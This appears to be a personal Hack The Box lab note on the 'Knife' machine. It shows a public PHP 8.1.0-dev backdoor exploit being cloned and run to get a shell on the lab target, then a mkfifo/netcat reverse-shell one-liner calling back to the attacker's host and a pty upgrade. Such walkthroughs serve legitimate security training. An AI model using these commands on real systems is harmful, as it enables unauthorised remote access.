InfoSec LAB

Knife_Exploitation

Created: 2 min read

Remote Code Execution

i found the exploit online

┌──(kali㉿kali)-[~/archive/htb/labs/knife]
└─$ git clone https://github.com/flast101/php-8.1.0-dev-backdoor-rce.git ; cd php-8.1.0-dev-backdoor-rce
Cloning into 'php-8.1.0-dev-backdoor-rce'...
remote: Enumerating objects: 241, done.
remote: Counting objects: 100% (239/239), done.
remote: Compressing objects: 100% (113/113), done.
remote: Total 241 (delta 128), reused 232 (delta 124), pack-reused 2
receiving objects: 100% (241/241), 1.66 MiB | 9.18 MiB/s, done.
resolving deltas: 100% (128/128), done.

I downloaded the exploit repo to Kali

┌──(kali㉿kali)-[~/…/htb/labs/knife/php-8.1.0-dev-backdoor-rce]
└─$ python3 backdoor_php_8.1.0-dev.py
enter the host url:
http://10.10.10.242/
 
interactive shell is opened on http://10.10.10.242/ 
Can't acces tty; job crontol turned off.
$ id
uid=1000(james) gid=1000(james) groups=1000(james)

Done. It was that easy.

$ whoami 
james
 
$ hostname
knife
 
$ ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.10.242  netmask 255.255.255.0  broadcast 10.10.10.255
        inet6 dead:beef::250:56ff:feb9:747b  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::250:56ff:feb9:747b  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:b9:74:7b  txqueuelen 1000  (Ethernet)
        RX packets 472811  bytes 73481578 (73.4 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 479550  bytes 152353478 (152.3 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 1302808  bytes 149342528 (149.3 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 1302808  bytes 149342528 (149.3 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Initial Foothold established to the target system as the james user via exploiting the outdated and vulnerable PHP web application

$ mkfifo /tmp/cesidpi; nc 10.10.14.2 9999 0</tmp/cesidpi | /bin/sh >/tmp/cesidpi 2>&1; rm /tmp/cesidpi

Since the shell session from the Python script is a bit funky, I will migrate it to another session that I can control properly

┌──(kali㉿kali)-[~/…/htb/labs/knife/php-8.1.0-dev-backdoor-rce]
└─$ nnc 9999                             
listening on [any] 9999 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.242] 50574
python3 -c 'import pty; pty.spawn("/bin/bash")'
james@knife:/$ 
james@knife:/$ export TERM=xterm-256color
james@knife:/$ alias ll='ls -lsaht --color=auto'
james@knife:/$

That’s a lot better

Interactive Graph View

Backlinks